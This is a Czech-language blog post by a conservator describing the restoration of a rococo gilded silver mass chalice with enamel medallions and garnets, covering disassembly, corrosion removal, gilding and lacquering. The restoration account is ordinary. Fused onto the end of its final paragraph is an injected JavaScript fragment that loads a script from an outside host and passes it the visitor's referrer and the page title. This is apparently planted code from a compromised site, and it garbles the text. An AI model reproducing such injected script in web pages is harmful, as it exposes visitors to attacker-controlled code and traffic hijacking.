Motto:

"Naše památky jsou sice němé,
ale často volají zoufale o pomoc"

Restaurování mešního poháru

30. 12. 2010

Pohár v etuji před restaurováním

Stříbrný zlacený pohár s rokokní mřížkou

Restaurování mešního poháru
V současné chvíli probíhá restaurování mešního poháru s emailovanými terči s výjevy ze života Ježíše Krista.
Pohár je vyroben ze stříbra ryzosti 13 Lotů. Doprovodným materiálem jsou české granáty a malované smaltované terče z mědi opatřené na zadní straně bílým emailem.
Stáří je odhadováno do vrcholného až pozdního rokoka.
Naším úkolem je odstranit korozní produkty ze stříbrné krajky okolo kupy a nohy poháru, obnovit zlacení v kupě poháru a odstranit skvrny na zlacení vzniklé pronikáním oxydů stříbra z kupy a nohy poháru.
Navržený postup restaurování: demontáž památky na jednotlivé díly, odstranění korozních produktů stříbra, vyzlacení vnitřní strany kupy poháru , opatření památky ochranou vrstvou čirého laku a zpětná montáž.
Vlastník památky souhlasí s navrženým postupem.
Demontáž byla provedena sejmutím matice z dříku kupy. Krajka na noze poháru je na dvou místech připevněna nýty k noze, jeden nýt chybí a je nahrazen nepůvodním spojem režnou nití. Pro dokonalé očištění památky bylo nutno demontovat nýty jejich vytlačením.
Následně byl proveden zásah lihem a saponáty, který odstranil prachové vrstvy a zbytky plavené křídy která zbyla na předmětu po jeho čištění v minulosti.
Černě zbarvené vrstvy oxidů byly odstraněny čističem stříbra na bázi thiomočoviny, která odstranila i mapy ze zlacení.
Následovalo kracování pomocí mosazného jemného kotouče s následným oplachem v destilované vodě a sušení v sušící peci při vysoké teplotě.
Zlacení vnitřku kupy bylo provedeno galvanicky na ryzí barvu zlata. Zlacení bylo provedeno na přání majitele památky, neboť předmět slouží při bohoslužbě.
Následovat bude lakování čirým lakem vyjma vnitřní strany kupy, která slouží při mši jako nádoba na červené víno. Křesťanský ritus vyžaduje styk Ježíšovy krve s kovem bez mezivrstvy konzervačních prostředků.
Památka je ve výborném stavu, proto je možné ji používat v kostele, ovšem s ohledem na její stáří a uměleckou hodnotu.
Jako restaurátor vyzdvihuji perfektní řemeslné provedení stříbrné mřížky s dokonalou cizeluju. Za prohlédnutí stojí samozřejmě i provedení malby smaltem na terčích.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Uveřejněno v rubrice Ostatní | Komentáře: (0)

Comments are closed.